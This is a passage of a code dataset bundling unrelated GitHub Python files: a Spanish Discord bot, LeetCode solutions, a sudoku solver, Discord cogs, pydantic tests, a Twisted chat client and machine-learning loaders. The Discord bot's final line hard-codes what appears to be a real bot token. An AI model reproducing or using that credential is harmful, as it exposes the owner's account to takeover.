duro.\")\r\n@bot.command()\r\nasync def lea(ctx):\r\n await ctx.send(\"Un talentoso en el arte. (pero colorado :/)\")\r\n@bot.command()\r\nasync def fede(ctx):\r\n await ctx.send(\"Tiene que tomarse la vida con calma y dejar de empastillarse.\")\r\n@bot.command()\r\nasync def walter(ctx):\r\n await ctx.send(\"No importa cual sea la actividad. El te va a poner una excusa de porque no es el mejor en eso.\")\r\n@bot.command()\r\nasync def lucas(ctx):\r\n await ctx.send(\"Sabemos que es el más turbio de todos, aún asi lo queremos.\")\r\n@bot.command()\r\nasync def mauri(ctx):\r\n await ctx.send(\"Un blandito, fan de Auron y laburador (jajajajaja).\")\r\n@bot.command()\r\nasync def bon(ctx):\r\n await ctx.send(\"Él te bardea por las dudas, ni se lo piensa.\")\r\n@bot.command()\r\nasync def nacho(ctx):\r\n await ctx.send(\"Casi todo le da paja, le da paja hasta tener paja.\")\r\n@bot.command()\r\nasync def fer(ctx):\r\n await ctx.send(\"Fer, su risa lo incrimina más y más. Atras señor Fer AHHHHHHAIUSDHJIUASDHI\")\r\n@bot.command()\r\nasync def rusa(ctx):\r\n await ctx.send(\"Ansiosa, copada y juega bien al Cs 1.6 ¿Qué más queres?\")\r\n@bot.command()\r\nasync def pri(ctx):\r\n await ctx.send(\"Cara de angel pero fan del kpop, una lástima. Aunque buen gusto para el anime.\")\r\n@bot.command()\r\nasync def saul(ctx):\r\n await ctx.send(\"De forma unánime creemos que es el más confiable, aunque sea un rompehuevos de Jojo's.\")\r\n@bot.command()\r\nasync def gaston(ctx):\r\n await ctx.send(\"Un talentoso que puede jugar al Counter sin mouse, un distinto.\")\r\n\r\n#YOUTUBE\r\n@bot.command()\r\nasync def yt(ctx, *, search):\r\n #estas son las palabras que el usuario busca\r\n query_string = parse.urlencode({'search_query': search})\r\n #le hacemos la peticion a youtube\r\n html_content = request.urlopen(\"http://www.youtube.com/results?\" + query_string)\r\n #extraemos los ids de los videos y tenemos una lista\r\n search_results = re.findall(r\"watch\\?v=(\\S{11})\", html_content.read().decode())\r\n #enviamos solo el primer resultado\r\n await ctx.send('https://www.youtube.com/watch?v=' + search_results[0])\r\n\r\n#evento\r\n#este evento nos dice que el bot esta listo\r\n@bot.event\r\nasync def on_ready():\r\n #podemos configurar que el bot muestre que estamos stremeando, de esta forma: \r\n #await bot.change_presence(activity=discord.Streaming(name=\"Tutorial\", url=\"http://www.twitch.tv/accountname\"))\r\n print(\"My bot is ready\")\r\n\r\n#ejecutamos\r\n#pero a este \"run\" hay que darle un token que sacarmos de la aplicacion de discord\r\nbot.run(\"NzUwMTExMjAzNDQ3MTQ0NDQ4.X01xfw.W7hwjATDQ9R2NJ_XYsaUQw0pJ3g\")","repo_name":"MateoIfran/discordbot","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2071871663","text":"class Solution(object):\n def isSubtree(self, s, t):\n \"\"\"\n :type s: TreeNode\n :type t: TreeNode\n :rtype: bool\n \"\"\" \n if not s: return False\n def isSameTree(p, q):\n if not p and not q: return True\n if not p or not q: return False\n if p.val != q.val: return False\n return isSameTree(p.left, q.left) and isSameTree(p.right, q.right)\n \n return isSameTree(s, t) or self.isSubtree(s.left, t) or self.isSubtree(s.right, t)\n \n\n#Use a helper function \"check\"\nclass Solution(object):\n def isSubtree(self, s, t):\n \"\"\"\n :type s: TreeNode\n :type t: TreeNode\n :rtype: bool\n \"\"\"\n \n if not s and not t:\n return True\n if not s or not t:\n return False\n \n if self.check(s,t):\n return True\n \n return self.isSubtree(s.left, t) or self.isSubtree(s.right, t)\n \n def check(self, s, t):\n if not s and not t:\n return True\n if not s or not t:\n return False \n if s.val != t.val:\n return False\n return self.check(s.left, t.left) and self.check(s.right, t.right)\n\n#use preorder traversal to generate a string\nclass Solution(object):\n def isSubtree(self, s, t):\n \"\"\"\n :type s: TreeNode\n :type t: TreeNode\n :rtype: bool\n \"\"\"\n sstr = ''\n for x in self.preorder(s):\n sstr += str(x.val)\n \n \n tstr = ''\n for x in self.preorder(t):\n tstr += str(x.val)\n \n return tstr in sstr\n \n def preorder(self, node):\n if node:\n yield TreeNode('#') #represent start of a subtree\n yield node\n for x in self.preorder(node.left): yield x\n for x in self.preorder(node.right): yield x\n yield TreeNode('*') #represent leaf end\n \n","repo_name":"mcfair/Algo","sub_path":"Tree/572. Subtree of Another Tree.py","file_name":"572. Subtree of Another Tree.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35452417805","text":"\n# https://leetcode-cn.com/problems/move-zeroes/\n\nfrom typing import List\n\nclass Solution:\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n\n raw_len = len(nums)\n while 0 in nums:\n nums.remove(0)\n filter_len = len(nums)\n for i in range(raw_len - filter_len):\n nums.append(0)\n\n\ns = Solution()\nprint(s.moveZeroes(nums=[0,1,0,3,12]))","repo_name":"azhu51/leetcode-practice","sub_path":"top_interview/easy_array_283.py","file_name":"easy_array_283.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27709290472","text":"\n\n\n#Chosen assignment is: writing words counter\ndef wordCount(file):\n counter = {}\n with open(file, 'r') as f:\n text = \"\".join(f.readlines())\n for sentence in text.split('\\n'):\n for textWord in sentence.split():\n counter[textWord] = counter.get(textWord,0) + 1\n return counter\n\nprint(wordCount(\"words.txt\"))","repo_name":"Sagiv648/college-work","sub_path":"python/7_6-12-22/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1504582884","text":"import imp\nimport os\nimport time\nclass Table():\n # Size = N x N\n def __init__(self):\n self.size = 9\n self.table = self.create_table()\n\n \n # Getters n' Setters\n def get_table(self):\n return self.table\n \n def get_positions(self, number):\n positions = []\n for pos_line, line in enumerate(self.table):\n for pos_item, item in enumerate(line):\n if item == number:\n positions.append((pos_line, pos_item))\n \n return positions\n \n def get_number(self, position):\n return self.table[position[0]][position[1]]\n\n def set_number(self, position, number):\n self.table[position[0]][position[1]] = number\n\n # Methods\n def create_table(self):\n table = []\n\n for i in range(self.size):\n line = []\n for c in range(self.size):\n line.append(0)\n \n table.append(line)\n \n return table\n\n def table_to_string(self):\n string = \"\"\n for pl, line in enumerate(self.table):\n for pos, cell in enumerate(line):\n if (((pos + 1) % 3) == 0) and ((pos + 1) != 9):\n string += f\"{cell} | \"\n else:\n string += f\"{cell} \"\n if ((pl + 1) % 3) == 0 and ((pl + 1) != 9):\n string += \"\\n------X-------X------\\n\"\n else:\n string += \"\\n\"\n\n return string\n\n def number_is_valid(self, r, c, k):\n not_in_row = k not in self.table[r]\n not_in_column = k not in [self.table[i][c] for i in range(0, self.size)]\n \n subgrid_rows_range = range(r//3*3, r//3*3+3)\n subgrid_cols_range = range(c//3*3, c//3*3+3)\n\n not_in_box = k not in [ self.table[i][j] for i in subgrid_rows_range for j in subgrid_cols_range] \n\n return (not_in_row and not_in_column and not_in_box)\n\n def solve(self, r=0, c=0):\n os.system('cls' if os.name == 'nt' else 'clear')\n print(self.table_to_string())\n if r == self.size:\n # Verificando se chegou na ultima linha\n return True\n elif c == self.size:\n # Verificando se chegou no ultimo item da coluna e descendo a linha\n return self.solve(r+1, 0)\n elif self.table[r][c] != 0:\n # Pulando celula caso já esteja preenchida\n return self.solve(r, c+1)\n else:\n # Testando todas as possibilidades de numero de 1 a 9\n for k in range(1, self.size + 1):\n if self.number_is_valid(r, c, k):\n self.table[r][c] = k\n\n if self.solve(r, c+1):\n return True\n self.table[r][c] = 0\n return False\n ","repo_name":"duvrdx/sudoku_solver","sub_path":"python/TableSolverV2.py","file_name":"TableSolverV2.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"74529529447","text":"# ideal-shock-test.py\n#\n# $ prep-gas ideal-air.inp ideal-air-gas-model.lua\n# $ python3 ideal-shock-test.py\n#\n# PJ, 2019-11-28\n# \nimport math\nfrom eilmer.gas import GasModel, GasState, GasFlow\n\ngmodel = GasModel('ideal-air-gas-model.lua')\nstate1 = GasState(gmodel)\nstate1.p = 125.0e3 # Pa\nstate1.T = 300.0 # K\nstate1.update_thermo_from_pT()\nstate1.update_sound_speed()\nprint(\"state1: %s\" % state1)\nprint(\"normal shock (in ideal gas), given shock speed\")\nvs = 2414.0\nstate2 = GasState(gmodel)\nflow = GasFlow(gmodel)\nv2, vg = flow.ideal_shock(state1, vs, state2)\nprint(\"v2=%g vg=%g\" % (v2, vg))\nprint(\"state2: %s\" % state2)\n","repo_name":"lkampoli/Eilmer4","sub_path":"examples/gasdyn/ideal-shock-test.py","file_name":"ideal-shock-test.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18067488603","text":"import discord\n\n\nasync def output(ctx, lists: list[str], title: str, ephemeral):\n embed = discord.Embed(title=title,\n type=\"rich\",\n colour=discord.Colour.from_rgb(0, 0, 0)\n )\n\n for content in lists:\n embed.add_field(name=\"-\",\n value=content,\n inline=False)\n\n await ctx.respond(content=\"\", embeds=[embed], ephemeral=ephemeral)\n\n\nasync def print(ctx, content: str, entries: list, title: str = None, ephemeral=True):\n data = []\n for entry in entries:\n if len(content + entry) > 1000:\n data.append(content)\n content = entry\n if len(data) == 4:\n await output(ctx, data, title, True)\n data = []\n else:\n content += \"\\n\" + entry\n data.append(content)\n await output(ctx, data, title, ephemeral)\n","repo_name":"jaimevisser/scrimbot","sub_path":"scrimbot/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"13422087146","text":"#coding:utf-8\r\nimport pygame \r\nwindowResolution = (640,480)\r\npygame.init()\r\npygame.display.set_caption(\"Les evenements\")\r\nwindowSurface = pygame.display.set_mode(windowResolution,pygame.RESIZABLE)\r\narialfont = pygame.font.SysFont(\"arial\",30)\r\nwhiteColor = (255,255,255)\r\nblackColor = (0,0,0)\r\ndimentisionText = arialfont.render(\"{}\".format(windowResolution),True,whiteColor)\r\nwindowSurface.blit(dimentisionText,[20,10])\r\npygame.display.flip()\r\nlaunched = True\r\nwhile launched :\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n launched = False\r\n elif event.type == pygame.VIDEORESIZE:\r\n windowSurface.fill(blackColor)\r\n dimentisionText = arialfont.render(\"{}x{}\".format(event.w , event.h),True,whiteColor)\r\n windowSurface.blit(dimentisionText,[20,10])\r\n pygame.display.flip()\r\n launched = True\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_UP:\r\n print(\"haut\")\r\n elif event.key == pygame.K_DOWN:\r\n print(\"bas\")\r\n elif event.type == pygame.MOUSEMOTION:\r\n print(\"{}\".format(event.pos))\r\n \r\n\r\n\r\n","repo_name":"CherifaHamroun/python-project","sub_path":"Cours/Evenements.py","file_name":"Evenements.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4081850323","text":"from single_stage_model.dataset.kitti import KittiDataset\nimport sys\nsys.path.append(\"/media/ubuntu-502/pan1/liang/PVRCNN-V1.1/single_stage_model/dataset\")\ntry:\n from single_stage_model.dataset.leishen_dataset.LSDataset import LeiShenDataset\nexcept:\n from ..dataset.leishen_dataset.LSDataset import LeiShenDataset\n\nimport torch\nfrom torch.utils.data import DataLoader\n\n# from single_stage_model.configs.single_stage_config import cfg\n\ndef build_data_loader(cfg,batch_size=1,num_workers=2,training=True,split=\"train\",logger=None,args=None,train_all=None,dist=False):\n if cfg.get(\"LEISHEN\",None) is None:\n dataset = KittiDataset(datapath=cfg.DATA_DIR,\n class_name=cfg.CLASS_NAMES,\n training=training,\n split=split,\n #split = cfg.MODEL[\"TRAIN\" if training else \"TEST\"].SPLIT,\n logger= logger,\n args =args,\n train_all=train_all,\n )\n else:\n dataset = LeiShenDataset(datapath=cfg.DATA_DIR,\n class_name=cfg.CLASS_NAMES,\n training=training,\n split=split,\n #split = cfg.MODEL[\"TRAIN\" if training else \"TEST\"].SPLIT,\n logger= logger,\n args =args,\n train_all=train_all,\n )\n sampler = torch.utils.data.distributed.DistributedSampler(dataset) if dist else None\n dataloader = DataLoader(dataset=dataset,\n batch_size=batch_size,\n pin_memory=True,\n num_workers=num_workers,\n shuffle=(sampler is None) and training,\n collate_fn=dataset.collate_batch,\n drop_last=False,\n sampler=sampler,\n timeout=0\n )\n return dataset,dataloader,sampler","repo_name":"liangzhao123/IOU-SSD","sub_path":"single_stage_model/dataset/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"29053841234","text":"import asyncio\nimport platform\nimport random\n\nimport discord\nfrom discord.ext import commands\n\n\nclass Misc(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_ready(self):\n print(f\"{self.__class__.__name__} Cog has been loaded\\n-----\")\n\n @commands.command(\n name=\"stats\", description=\"A useful command that displays bot statistics.\"\n )\n async def stats(self, ctx):\n pythonVersion = platform.python_version()\n dpyVersion = discord.__version__\n serverCount = len(self.bot.guilds)\n memberCount = len(set(self.bot.get_all_members()))\n\n embed = discord.Embed(\n title=f\"{self.bot.user.name} Stats\",\n description=\"\\uFEFF\",\n colour=ctx.author.colour,\n timestamp=ctx.message.created_at,\n )\n\n embed.add_field(name=\"Bot Version:\", value=self.bot.version)\n embed.add_field(name=\"Python Version:\", value=pythonVersion)\n embed.add_field(name=\"Discord.Py Version\", value=dpyVersion)\n # noinspection PyTypeChecker\n embed.add_field(name=\"Total Guilds:\", value=serverCount)\n # noinspection PyTypeChecker\n embed.add_field(name=\"Total Users:\", value=memberCount)\n embed.add_field(name=\"Bot Developers:\", value=\"<@380153305394839554>\")\n\n embed.set_footer(text=f\"Zero Two | {self.bot.user.name}\")\n embed.set_author(name=self.bot.user.name, icon_url=self.bot.user.avatar_url)\n\n await ctx.send(embed=embed)\n\n @commands.command(\n name=\"echo\",\n description=\"A simple command that repeats the users input back to them.\",\n )\n async def echo(self, ctx):\n await ctx.message.delete()\n embed = discord.Embed(\n title=\"Please tell me what you want me to repeat!\",\n description=\"||This request will timeout after 1 minute.||\",\n )\n sent = await ctx.send(embed=embed)\n\n try:\n msg = await self.bot.wait_for(\n \"message\",\n timeout=60,\n check=lambda message: message.author == ctx.author\n and message.channel == ctx.channel,\n )\n if \"@everyone\" in msg.content:\n await ctx.send(\"Nice Try!\")\n await sent.delete()\n await msg.delete()\n return\n elif msg:\n await sent.delete()\n await msg.delete()\n await ctx.send(msg.content)\n except asyncio.TimeoutError:\n await sent.delete()\n await ctx.send(\"Cancelling\", delete_after=10)\n\n @commands.command(\n name=\"toggle\", description=\"Enable or disable a command!\"\n )\n @commands.is_owner()\n async def toggle(self, ctx, *, command):\n command = self.bot.get_command(command)\n\n if command is None:\n await ctx.send(\"I can't find a command with that name!\")\n\n elif ctx.command == command:\n await ctx.send(\"You cannot disable this command.\")\n\n else:\n command.enabled = not command.enabled\n ternary = \"enabled\" if command.enabled else \"disabled\"\n await ctx.send(f\"I have {ternary} {command.qualified_name} for you!\")\n\n @commands.command(\n name='ping', description='Gets the bots Ping!'\n\n )\n async def ping(self, ctx):\n await ctx.send(f'Pong! {round(self.bot.latency * 1000)}ms')\n\n @commands.command(name='avatar', description='Steals someones Avatar', aliases=['av'])\n async def avatar(self, ctx, *, member: discord.Member = None):\n if not member:\n member = ctx.message.author\n userAvatar = member.avatar_url\n await ctx.send(userAvatar)\n\n @commands.command(name='serverinfo', description='Shows you the Serverinfo')\n async def serverinfo(self, ctx):\n name = str(ctx.guild.name)\n description = str(ctx.guild.description)\n\n owner = str(ctx.guild.owner)\n iD = str(ctx.guild.id)\n region = str(ctx.guild.region)\n memberCount = str(ctx.guild.member_count)\n icon = str(ctx.guild.icon_url)\n embed = discord.Embed(\n title=name + \" Server Information\",\n description=description,\n color=random.choice(self.bot.color_list)\n )\n embed.set_thumbnail(url=icon)\n embed.add_field(name=\"Owner\", value=owner, inline=True)\n embed.add_field(name=\"Server ID\", value=iD, inline=True)\n embed.add_field(name=\"Region\", value=region, inline=True)\n embed.add_field(name=\"Member Count\", value=memberCount, inline=True)\n await ctx.send(embed=embed)\n\n\ndef setup(bot):\n bot.add_cog(Misc(bot))\n","repo_name":"imwood04/Bot02","sub_path":"cogs/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42872726319","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ncomprehension exercises\n列表解析是按要求生成列表\n\"\"\"\n\nfrom common import *\n\n\n# 请编写一个函数,它接受一个 list,然后把list中的所有字符串变成大写后返回,非字符串元素将被忽略。\ndef to_uppers(org):\n return [x.upper() for x in org if isinstance(x, str)]\n\n\n# 找出对称的 3 位数。例如,121 就是对称数\ndef symmetry():\n return [x * 100 + y * 10 + x for x in range(1, 10) for y in range(0, 10)]\n\n\ndef demo():\n # 1-100 并打印出7的倍数\n rst = [x for x in range(1, 101) if x % 7 == 0]\n # 生成列表 [1x2, 3x4, 5x6, 7x8, ..., 99x100]\n rst = [x * (x + 1) for x in range(1, 100, 2)]\n print(to_uppers(['Hello', 'world', 101]))\n print(symmetry())\n\n\ndef main():\n try:\n try:\n demo()\n except Exception as e:\n raise Usage(e)\n except Usage as usg:\n Usage.show_info()\n return -1\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"Jjunxi/EXERCISES","sub_path":"comprehension.py","file_name":"comprehension.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27477627670","text":"from __future__ import annotations\nfrom typing import TYPE_CHECKING\nfrom discord.ext import commands\nimport os\nimport discord\n\nif TYPE_CHECKING:\n from main import Saita\n\n\nclass Owner(commands.Cog):\n 'This cog has commands for the bot developer.'\n\n def __init__(self, bot: Saita):\n self.bot: Saita = bot\n\n def im_developer(interaction: discord.Interaction):\n return interaction.user.id == interaction.client.application.owner.id\n\n color = 2829617\n\n @discord.app_commands.command(\n name='reload',\n description='Reload all cogs.'\n )\n @discord.app_commands.check(im_developer)\n async def reload(self, interaction: discord.Interaction):\n embed = discord.Embed(color=self.color)\n\n for file in os.listdir('./cogs'):\n try:\n if file.endswith('.py'):\n await self.bot.reload_extension(f'cogs.{file[:-3]}')\n except commands.ExtensionError as error:\n embed.description = '{}: {}'.format(\n type(error).__name__, error)\n\n break\n else:\n embed.description = '**All cogs has been reloaded.**'\n\n await interaction.response.send_message(embed=embed)\n\n\nasync def setup(bot: commands.Bot):\n await bot.add_cog(Owner(bot))\n","repo_name":"guillejabase/saitabot-py","sub_path":"cogs/owner.py","file_name":"owner.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41988803074","text":"import json\nimport pickle\nfrom typing import List, Tuple, Union\n\nimport pytest\n\nfrom pydantic import BaseModel, Field, Protocol, ValidationError, parse_obj_as\n\n\nclass Model(BaseModel):\n a: float\n b: int = 10\n\n\ndef test_obj():\n m = Model.parse_obj(dict(a=10.2))\n assert str(m) == 'a=10.2 b=10'\n\n\ndef test_parse_obj_fails():\n with pytest.raises(ValidationError) as exc_info:\n Model.parse_obj([1, 2, 3])\n assert exc_info.value.errors() == [\n {'loc': ('__root__',), 'msg': 'Model expected dict not list', 'type': 'type_error'}\n ]\n\n\ndef test_parse_obj_submodel():\n m = Model.parse_obj(Model(a=10.2))\n assert m.dict() == {'a': 10.2, 'b': 10}\n\n\ndef test_parse_obj_wrong_model():\n class Foo(BaseModel):\n c = 123\n\n with pytest.raises(ValidationError) as exc_info:\n Model.parse_obj(Foo())\n assert exc_info.value.errors() == [{'loc': ('a',), 'msg': 'field required', 'type': 'value_error.missing'}]\n\n\ndef test_parse_obj_root():\n class MyModel(BaseModel):\n __root__: str\n\n m = MyModel.parse_obj('a')\n assert m.dict() == {'__root__': 'a'}\n assert m.__root__ == 'a'\n\n\ndef test_parse_root_list():\n class MyModel(BaseModel):\n __root__: List[str]\n\n m = MyModel.parse_obj(['a'])\n assert m.dict() == {'__root__': ['a']}\n assert m.__root__ == ['a']\n\n\ndef test_parse_nested_root_list():\n class NestedData(BaseModel):\n id: str\n\n class NestedModel(BaseModel):\n __root__: List[NestedData]\n\n class MyModel(BaseModel):\n nested: NestedModel\n\n m = MyModel.parse_obj({'nested': [{'id': 'foo'}]})\n assert isinstance(m.nested, NestedModel)\n assert isinstance(m.nested.__root__[0], NestedData)\n\n\ndef test_parse_nested_root_tuple():\n class NestedData(BaseModel):\n id: str\n\n class NestedModel(BaseModel):\n __root__: Tuple[int, NestedData]\n\n class MyModel(BaseModel):\n nested: List[NestedModel]\n\n data = [0, {'id': 'foo'}]\n m = MyModel.parse_obj({'nested': [data]})\n assert isinstance(m.nested[0], NestedModel)\n assert isinstance(m.nested[0].__root__[1], NestedData)\n\n nested = parse_obj_as(NestedModel, data)\n assert isinstance(nested, NestedModel)\n\n\ndef test_parse_nested_custom_root():\n class NestedModel(BaseModel):\n __root__: List[str]\n\n class MyModel(BaseModel):\n __root__: NestedModel\n\n nested = ['foo', 'bar']\n m = MyModel.parse_obj(nested)\n assert isinstance(m, MyModel)\n assert isinstance(m.__root__, NestedModel)\n assert isinstance(m.__root__.__root__, List)\n assert isinstance(m.__root__.__root__[0], str)\n\n\ndef test_json():\n assert Model.parse_raw('{\"a\": 12, \"b\": 8}') == Model(a=12, b=8)\n\n\ndef test_json_ct():\n assert Model.parse_raw('{\"a\": 12, \"b\": 8}', content_type='application/json') == Model(a=12, b=8)\n\n\ndef test_pickle_ct():\n data = pickle.dumps(dict(a=12, b=8))\n assert Model.parse_raw(data, content_type='application/pickle', allow_pickle=True) == Model(a=12, b=8)\n\n\ndef test_pickle_proto():\n data = pickle.dumps(dict(a=12, b=8))\n assert Model.parse_raw(data, proto=Protocol.pickle, allow_pickle=True) == Model(a=12, b=8)\n\n\ndef test_pickle_not_allowed():\n data = pickle.dumps(dict(a=12, b=8))\n with pytest.raises(RuntimeError):\n Model.parse_raw(data, proto=Protocol.pickle)\n\n\ndef test_bad_ct():\n with pytest.raises(ValidationError) as exc_info:\n Model.parse_raw('{\"a\": 12, \"b\": 8}', content_type='application/missing')\n assert exc_info.value.errors() == [\n {'loc': ('__root__',), 'msg': 'Unknown content-type: application/missing', 'type': 'type_error'}\n ]\n\n\ndef test_bad_proto():\n with pytest.raises(ValidationError) as exc_info:\n Model.parse_raw('{\"a\": 12, \"b\": 8}', proto='foobar')\n assert exc_info.value.errors() == [{'loc': ('__root__',), 'msg': 'Unknown protocol: foobar', 'type': 'type_error'}]\n\n\ndef test_file_json(tmpdir):\n p = tmpdir.join('test.json')\n p.write('{\"a\": 12, \"b\": 8}')\n assert Model.parse_file(str(p)) == Model(a=12, b=8)\n\n\ndef test_file_json_no_ext(tmpdir):\n p = tmpdir.join('test')\n p.write('{\"a\": 12, \"b\": 8}')\n assert Model.parse_file(str(p)) == Model(a=12, b=8)\n\n\ndef test_file_json_loads(tmp_path):\n def custom_json_loads(*args, **kwargs):\n data = json.loads(*args, **kwargs)\n data['a'] = 99\n return data\n\n class Example(BaseModel):\n a: int\n\n class Config:\n json_loads = custom_json_loads\n\n p = tmp_path / 'test_json_loads.json'\n p.write_text('{\"a\": 12}')\n\n assert Example.parse_file(p) == Example(a=99)\n\n\ndef test_file_pickle(tmpdir):\n p = tmpdir.join('test.pkl')\n p.write_binary(pickle.dumps(dict(a=12, b=8)))\n assert Model.parse_file(str(p), allow_pickle=True) == Model(a=12, b=8)\n\n\ndef test_file_pickle_no_ext(tmpdir):\n p = tmpdir.join('test')\n p.write_binary(pickle.dumps(dict(a=12, b=8)))\n assert Model.parse_file(str(p), content_type='application/pickle', allow_pickle=True) == Model(a=12, b=8)\n\n\ndef test_const_differentiates_union():\n class SubModelA(BaseModel):\n key: str = Field('A', const=True)\n foo: int\n\n class SubModelB(BaseModel):\n key: str = Field('B', const=True)\n foo: int\n\n class Model(BaseModel):\n a: Union[SubModelA, SubModelB]\n\n m = Model.parse_obj({'a': {'key': 'B', 'foo': 3}})\n assert isinstance(m.a, SubModelB)\n","repo_name":"jochenvdv/snakepack","sub_path":"tests/acceptance/subjects/pydantic/tests/test_parse.py","file_name":"test_parse.py","file_ext":"py","file_size_in_byte":5396,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"24992786003","text":"import pickle\nimport sys\n\nfrom rich.console import Console\nfrom rich.markdown import Markdown\nfrom rich.prompt import IntPrompt, Prompt\nfrom twisted.internet import reactor\nfrom twisted.internet.endpoints import TCP4ClientEndpoint\nfrom twisted.internet.protocol import Protocol\nfrom twisted.internet.protocol import ReconnectingClientFactory as BaseClientFactory\n\nfrom utility import Message\n\n\nclass Client(Protocol):\n def __init__(self, console):\n self.STDOUT = console\n\n reactor.callInThread(self.send_message)\n\n def dataReceived(self, data):\n message = pickle.loads(data)\n if message.mtype == \"MSG\":\n self.STDOUT.rule(message.msg)\n elif message.mtype == \"MD\":\n md = Markdown(message.msg)\n self.STDOUT.print(\n f\"[bold][red]\\[{message.timestamp.strftime('%H:%M')}][/][green]\\[{message.author}][/][/]\"\n )\n self.STDOUT.print(md)\n else:\n self.STDOUT.print(str(message))\n\n def send_message(self):\n while True:\n # msg = input()\n\n _msg = []\n line = \" \"\n while line != \"\":\n line = input()\n _msg.append(line)\n\n msg = \"\\n\".join(_msg).strip()\n message = Message(msg, mtype=\"MD\").encode_msg()\n self.transport.write(message)\n\n\nclass ClientFactory(BaseClientFactory):\n def __init__(self, console: Console):\n self.console = console\n\n def buildProtocol(self, addr):\n return Client(self.console)\n\n def clientConnectionFailed(self, connector, reason):\n print(reason)\n BaseClientFactory.clientConnectionFailed(self, connector, reason)\n\n def clientConnectionLost(self, connector, reason):\n print(reason)\n BaseClientFactory.clientConnectionLost(self, connector, reason)\n\n\nif __name__ == \"__main__\":\n endpoint = TCP4ClientEndpoint(reactor, \"localhost\", 9999)\n\n console = Console()\n clFactory = ClientFactory(console)\n\n endpoint.connect(clFactory)\n reactor.run()\n","repo_name":"SparshChaurasia/ChatAppRewrite","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31173494035","text":"import math\nimport os\nimport torch\nfrom torch import nn, einsum\nfrom torchvision import models\nimport torch.nn.functional as F\nfrom einops import rearrange, repeat\n\nfrom lib.backbone import *\nfrom pretrainedmodels import se_resnext50_32x4d, resnet50, resnet34\n\npre_trained_backbone = '../ckpt/pre_trained_backbone'\nmobilenet_path = os.path.join(pre_trained_backbone, 'mobilenet', 'mobilenetv3-large-1cd25616.pth' )\n\ndef weight_xavier_init(*models):\n for model in models:\n for module in model.modules():\n if isinstance(module, nn.Conv2d) or isinstance(module, nn.Linear):\n nn.init.xavier_normal_(module.weight)\n # nn.init.orthogonal_(module.weight)\n # nn.init.kaiming_normal_(module.weight)\n if module.bias is not None:\n module.bias.data.zero_()\n elif isinstance(module, nn.BatchNorm2d):\n module.weight.data.fill_(1)\n module.bias.data.zero_()\n\n\nclass BatchNorm1d_GNN(nn.BatchNorm1d):\n '''Batch normalization over features'''\n\n def __init__(self, num_features):\n super(BatchNorm1d_GNN, self).__init__(num_features)\n\n def forward(self, x):\n return super(BatchNorm1d_GNN, self).forward(x.permute(0, 2, 1)).permute(0, 2, 1)\n\n\nclass Encoder_AE(nn.Module):\n def __init__(self,\n in_dim=None,\n out_dim=16,\n heads=1,\n mv=3\n ):\n super(Encoder_AE, self).__init__()\n if in_dim is None:\n in_dim = {'q': 256, 'z': 512, 'k': 1024}\n self.multi_heads = heads\n self.cross_views = mv\n self.label_coef = nn.Parameter(torch.eye(out_dim))\n\n self.k = nn.Conv2d(in_dim['k'], out_dim, 3, padding=1, bias=True)\n self.z = nn.Conv2d(in_dim['z'], out_dim * heads, 3, padding=1, bias=True)\n self.q = nn.Conv2d(in_dim['q'], out_dim, 3, padding=1, bias=True)\n\n def forward(self, x):\n b, _, kh, kw = x['k'].size()\n b, _, zh, zw = x['z'].size()\n b, _, qh, qw = x['q'].size() # qh = 2*zh = 4*kh\n\n m = self.multi_heads\n cv = int(self.cross_views)\n\n K = [repeat(self.view_aug(self.k(self.view_aug(x['k'], i, False)), i, True).reshape(b, 1, 1, kh * kw, -1),\n 'b v c i j -> b v (y c) i j', y=m)\n for i in range(cv)]\n K = torch.cat(K, 1) # b, 4, m kh*kw -1\n\n Q = self.q(x['q'])\n Z = self.z(x['z'])\n\n b, v, m, n, d = K.size()\n Ks = K.reshape(b, n, v, m * d).reshape(b, v * m * d, kh, kw)\n\n Zs = F.interpolate(Z, (qh, qw), mode='bilinear', align_corners=False)\n Ks = F.interpolate(Ks, (qh, qw), mode='bilinear', align_corners=False)\n QZK = torch.cat((Q, 